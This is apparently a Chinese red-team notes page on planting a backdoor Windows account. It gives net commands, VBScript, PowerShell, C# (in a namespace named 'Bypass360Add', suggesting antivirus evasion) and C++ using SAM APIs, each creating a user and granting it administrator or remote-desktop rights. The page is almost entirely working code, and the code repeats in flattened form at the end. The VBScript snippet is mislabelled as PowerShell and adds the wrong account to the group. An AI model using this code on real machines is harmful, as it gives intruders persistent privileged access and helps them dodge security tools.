新建用户

新建用户并添加管理员及远程访问权限

命令行：

net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add

Powershell：

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

Powershell（另一个版本）：

$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"

c#（使用系统 API 函数）：

using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    public static class BypassUAC_csharp
    {
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);
        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "qwqdanchun";
            string password = "password";
            string groupname = "Administrators";
            local.AddUser(null, username, password, null);
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1);
        }
    }
    public class LocalGroupUserHelper
    {
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // //lgrmi3_domainandname
        }
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;
            public int usri1_flags;
            public string usri1_script_path;
        }
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding User");
            }
        }
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

c++(重写AddUser)：

#include "ApiAddUser.h"



int wmain(int argc, wchar_t* argv[])
{
	UNICODE_STRING UserName;
	UNICODE_STRING PassWord;
	HANDLE ServerHandle = NULL;
	HANDLE DomainHandle = NULL;
	HANDLE UserHandle = NULL;
	ULONG GrantedAccess;
	ULONG RelativeId;
	NTSTATUS Status = NULL;
	HMODULE hSamlib = NULL;
	HMODULE hNtdll = NULL;
	HMODULE hNetapi32 = NULL;
	LSA_HANDLE hPolicy = NULL;
	LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
	PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
	USER_ALL_INFORMATION uai = { 0 };


	hSamlib = LoadLibraryA("samlib.dll");
	hNtdll = LoadLibraryA("ntdll");

	pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
	pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
	pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
	pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
	pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
	pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

	RtlInitUnicodeString(&UserName, L"Admin");
	RtlInitUnicodeString(&PassWord, L"Admin");

	Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
	Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
	Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

	Status = SamOpenDomain(ServerHandle, 
		DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
		DomainInfo->DomainSid, 
		&DomainHandle);

	Status = SamCreateUser2InDomain(DomainHandle,
		&UserName,
		USER_NORMAL_ACCOUNT,
		USER_ALL_ACCESS | DELETE | WRITE_DAC,
		&UserHandle,&GrantedAccess,&RelativeId);

	RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
	uai.NtPasswordPresent = TRUE;
	uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


	Status = SamSetInformationUser(UserHandle,
		UserAllInformation,
		&uai);

	return 0;
}

最后更新于4年前

这有帮助吗？

using System; using System.Runtime.InteropServices; namespace Bypass360Add { public static class BypassUAC_csharp { [DllImport("kernel32.dll")] static extern void ExitProcess(uint uExitCode); public static void Main(string[] args) { LocalGroupUserHelper local = new LocalGroupUserHelper(); string username = "qwqdanchun"; string password = "password"; string groupname = "Administrators"; local.AddUser(null, username, password, null); local.GroupAddMembers(null, groupname, username); ExitProcess(1); } } public class LocalGroupUserHelper { [DllImport("Netapi32.dll")] extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err); [DllImport("Netapi32.dll")] extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname, int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries); [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct LOCALGROUP_MEMBERS_INFO_3 { public string domainandname; // //lgrmi3_domainandname } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct USER_INFO_1 { public string usri1_name; public string usri1_password; public int usri1_password_age; public int usri1_priv; public string usri1_home_dir; public string comment; public int usri1_flags; public string usri1_script_path; } public void AddUser(string serverName, string userName, string password, string strComment) { USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例 NewUser.usri1_name = userName; // Allocates the username NewUser.usri1_password = password; // allocates the password NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER NewUser.usri1_home_dir = null; // We didn't supply a Home Directory NewUser.comment = strComment; // Comment on the User NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0 { Console.WriteLine("Error Adding User"); } } public void GroupAddMembers(string serverName, string groupName, string userName) { LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3(); NewMember.domainandname = userName; if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0 { Console.WriteLine("Error Adding Group Member"); } } } }

#include "ApiAddUser.h" int wmain(int argc, wchar_t* argv[]) { UNICODE_STRING UserName; UNICODE_STRING PassWord; HANDLE ServerHandle = NULL; HANDLE DomainHandle = NULL; HANDLE UserHandle = NULL; ULONG GrantedAccess; ULONG RelativeId; NTSTATUS Status = NULL; HMODULE hSamlib = NULL; HMODULE hNtdll = NULL; HMODULE hNetapi32 = NULL; LSA_HANDLE hPolicy = NULL; LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 }; PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL; USER_ALL_INFORMATION uai = { 0 }; hSamlib = LoadLibraryA("samlib.dll"); hNtdll = LoadLibraryA("ntdll"); pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect"); pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain"); pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain"); pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser"); pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); RtlInitUnicodeString(&UserName, L"Admin"); RtlInitUnicodeString(&PassWord, L"Admin"); Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);; Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy); Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo); Status = SamOpenDomain(ServerHandle, DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, DomainInfo->DomainSid, &DomainHandle); Status = SamCreateUser2InDomain(DomainHandle, &UserName, USER_NORMAL_ACCOUNT, USER_ALL_ACCESS | DELETE | WRITE_DAC, &UserHandle,&GrantedAccess,&RelativeId); RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer); uai.NtPasswordPresent = TRUE; uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT; Status = SamSetInformationUser(UserHandle, UserAllInformation, &uai); return 0; }